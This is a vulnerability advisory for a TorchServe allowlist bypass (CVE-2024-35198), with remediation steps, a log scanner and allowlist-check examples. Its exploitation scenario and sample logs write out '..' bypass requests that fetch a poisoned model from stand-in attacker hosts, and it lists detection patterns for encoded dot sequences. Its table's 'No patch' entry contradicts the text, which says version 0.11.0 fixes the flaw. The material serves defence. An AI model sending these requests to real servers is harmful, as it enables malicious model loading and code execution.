CVE-2024-35198: TorchServe: URL bypass enables arbitrary model loading

CRITICAL PoC AVAILABLE
Published July 19, 2024
CISO Take

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Risk Assessment

Critical. A CVSS 9.8 rating with no authentication, no user interaction, and a network-accessible attack vector makes this trivially exploitable from the internet. The bypass is a simple URL manipulation technique requiring no AI/ML knowledge. TorchServe management APIs are frequently left exposed on internal networks or in misconfigured cloud deployments, widening the blast radius. The core risk is not just model substitution but potential RCE through malicious model artifacts.

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
torchserve   pip                            No patch


Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 39% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade TorchServe to v0.11.0 or later — this is the only complete fix.

  2. IMMEDIATE WORKAROUND

    Restrict network access to the TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only.

  3. AUDIT

    Inspect the current model store for unexpected or recently added models; compare against your approved model registry.

  4. DETECT

    Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E).

  5. HARDEN

    Even post-patch, enforce network segmentation — management APIs should never be internet-facing.
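The DETECT step above names three indicators on a model-registration request: a literal `..`, the single-encoded form `%2E%2E`, and the double-encoded form `%252E`. The script below is an added example (not TorchServe's code and not part of this advisory) showing one way to turn that into detection logic: it percent-decodes the `url` parameter until it is stable, then alerts when any path segment is `..`, or when the registration comes from a source outside a trusted set. The log format, the trusted source set and all sample lines are constructed for illustration; adapt the regex to whatever proxy or WAF fronts your management port.

```python
"""Flag TorchServe model-registration requests carrying dot sequences or
coming from unexpected sources.

Added example, not TorchServe's own code. The access-log format, the
TRUSTED_SOURCES set and SAMPLE_LOG are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample lines in a common-log-like format: client ip, timestamp,
# request line, status. Lines 2-4 carry the indicators named in the advisory.
SAMPLE_LOG = """\
10.0.5.12 - - [19/Jul/2024:10:01:02 +0000] "POST /models?url=https://allowed-partner.com/resnet18.mar HTTP/1.1" 200
203.0.113.7 - - [19/Jul/2024:10:02:15 +0000] "POST /models?url=https://evil.example/../allowed-partner.com/poisoned_resnet.mar HTTP/1.1" 200
203.0.113.7 - - [19/Jul/2024:10:02:40 +0000] "POST /models?url=https%3A%2F%2Fevil.example%2F%2E%2E%2Fallowed-partner.com%2Fx.mar HTTP/1.1" 200
10.0.5.12 - - [19/Jul/2024:10:03:00 +0000] "POST /models?url=https://allowed-partner.com/%252E%252E/x.mar HTTP/1.1" 200
10.0.5.12 - - [19/Jul/2024:10:04:00 +0000] "GET /models HTTP/1.1" 200
10.0.5.12 - - [19/Jul/2024:10:05:00 +0000] "POST /predictions/resnet18 HTTP/1.1" 200
"""

# Constructed: the CI/CD and MLOps addresses allowed to register models.
TRUSTED_SOURCES = {"10.0.5.12"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def decode_fully(value, rounds=3):
    """Percent-decode until the string stops changing, so %252E -> %2E -> '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def url_has_dot_sequence(url):
    """True if any path segment of the fully decoded URL is exactly '..'."""
    path = urlparse(decode_fully(url)).path
    return any(seg == ".." for seg in path.split("/"))


def analyze_line(line):
    """Return the alert reasons for one log line; an empty list means benign."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return []
    target = urlparse(m["target"])
    if target.path != "/models":          # only model registration is of interest
        return []
    reasons = []
    if m["ip"] not in TRUSTED_SOURCES:
        reasons.append("untrusted-source")
    # parse_qs decodes one layer; decode_fully handles the rest.
    for url in parse_qs(target.query).get("url", []):
        if url_has_dot_sequence(url):
            reasons.append("dot-sequence")
            break
    return reasons


def scan(log_text):
    """Return (line_no, source_ip, reasons) for every registration worth alerting on."""
    alerts = []
    for n, line in enumerate(log_text.splitlines(), 1):
        reasons = analyze_line(line)
        if reasons:
            alerts.append((n, LOG_RE.match(line)["ip"], reasons))
    return alerts


if __name__ == "__main__":
    for n, ip, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {ip}: {', '.join(reasons)}")
```

Decoding until the value stops changing is what lets a single `..` segment test cover all three spellings the advisory lists; matching the raw strings `%2E%2E` or `%252E` individually would miss a mixed encoding such as `%2E.`. The source-IP check is deliberately separate so that a registration from an unexpected host is visible even when its URL is clean.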

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.1.4 - AI system resource and capability management
A.9.3 - AI system integrity
NIST AI RMF
MANAGE 2.2 - Mechanisms to sustain the value of deployed AI
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-35198?

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Is CVE-2024-35198 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-35198, increasing the risk of exploitation.

How to fix CVE-2024-35198?

1. PATCH: Upgrade TorchServe to v0.11.0 or later — this is the only complete fix.
2. IMMEDIATE WORKAROUND: Restrict network access to the TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only.
3. AUDIT: Inspect the current model store for unexpected or recently added models; compare against your approved model registry.
4. DETECT: Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E).
5. HARDEN: Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

What systems are affected by CVE-2024-35198?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps pipelines, inference infrastructure, training pipelines.

What is the CVSS score for CVE-2024-35198?

CVE-2024-35198 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.18%.

Technical Details

NVD Description

TorchServe is a flexible and easy-to-use tool for serving and scaling PyTorch models in production. TorchServe's check on the allowed_urls configuration can be bypassed if the URL contains characters such as "..", and it does not prevent the model from being downloaded into the model store. Once a file is downloaded, it can be referenced without providing a URL the second time, which effectively bypasses the allowed_urls security check. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and EKS are not affected. This issue in TorchServe has been fixed by validating the URL without characters such as ".." before downloading; see PR #3082. TorchServe release 0.11.0 includes the fix to address this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Exploitation Scenario

An attacker targeting an organization's ML inference infrastructure sends a POST request to TorchServe's management API: 'POST /models?url=https://evil.com/../allowed-partner.com/poisoned_resnet.mar'. The URL validation checks the allowlist against the raw string but does not normalize the path, so 'allowed-partner.com' appears in the URL and passes the check. TorchServe downloads the model from evil.com into the local model store. The attacker then triggers inference via 'POST /predictions/poisoned_resnet' — no URL required this time since the model is cached locally. The malicious MAR file executes arbitrary code during deserialization, establishing persistence or exfiltrating credentials from the ML worker process.
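The scenario turns on one design flaw: the allowlist is compared against the raw URL string, so an allowed host name anywhere in the path is enough to pass. The example below is added here to make that concrete from the defender's side; it is not TorchServe's implementation and the page does not show what PR #3082 actually changed. `lax_url_allowed` reproduces the behaviour the scenario describes (substring match against the raw string), and `hardened_url_allowed` does what the NVD description says the fix does: it rejects `..` before any download, after fully percent-decoding and parsing the URL, and then compares the hostname component alone against the allowlist. The allowlist hosts and function names are constructed; the bypass URL is the one quoted in the scenario.

```python
"""Model-URL allowlist check: the lax pattern beside a hardened one.

Added example, not TorchServe's code. ALLOWED_HOSTS and the function
names are constructed; BYPASS_URL is the URL from the advisory's scenario.
"""
from urllib.parse import unquote, urlsplit

# Constructed allowlist of hosts from which .mar archives may be fetched.
ALLOWED_HOSTS = {"allowed-partner.com", "models.internal.example"}


def lax_url_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """Lax check, as the scenario describes: the path is never normalized,
    so an allowed host name appearing anywhere in the raw string passes."""
    return any(host in url for host in allowed_hosts)


def hardened_url_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """Hardened check: fully decode, parse, refuse traversal segments, then
    match the hostname exactly. Runs before any download is attempted."""
    decoded = url
    for _ in range(3):                      # undo %252E -> %2E -> '.' layering
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    parts = urlsplit(decoded)
    if parts.scheme not in ("https", "http"):
        return False                         # no file://, no other schemes
    # Refuse any '..' or '.' segment outright rather than trying to resolve it.
    if any(seg in ("..", ".") for seg in parts.path.split("/")):
        return False
    # Compare only the hostname: userinfo such as 'allowed@evil' cannot help.
    host = parts.hostname
    return host is not None and host.lower() in allowed_hosts


BYPASS_URL = "https://evil.com/../allowed-partner.com/poisoned_resnet.mar"  # from the page
CLEAN_URL = "https://allowed-partner.com/resnet18.mar"                     # constructed


def compare(url):
    """Result of both checks for one URL, for side-by-side reading."""
    return {"lax": lax_url_allowed(url), "hardened": hardened_url_allowed(url)}


if __name__ == "__main__":
    for u in (CLEAN_URL, BYPASS_URL):
        print(u, compare(u))
```

Two points follow from running it. First, the hardened check is a whole-URL decision made before the fetch, which also closes the second half of the issue the NVD text describes: nothing unvetted reaches the model store, so there is nothing to re-register by name later. Second, matching `parts.hostname` rather than the raw string means a URL such as `https://evil.com/allowed-partner.com/x.mar`, which carries no `..` at all, is rejected too; the lax variant passes it.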

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
July 19, 2024
Last Modified
September 4, 2025
First Seen
July 19, 2024

Related Vulnerabilities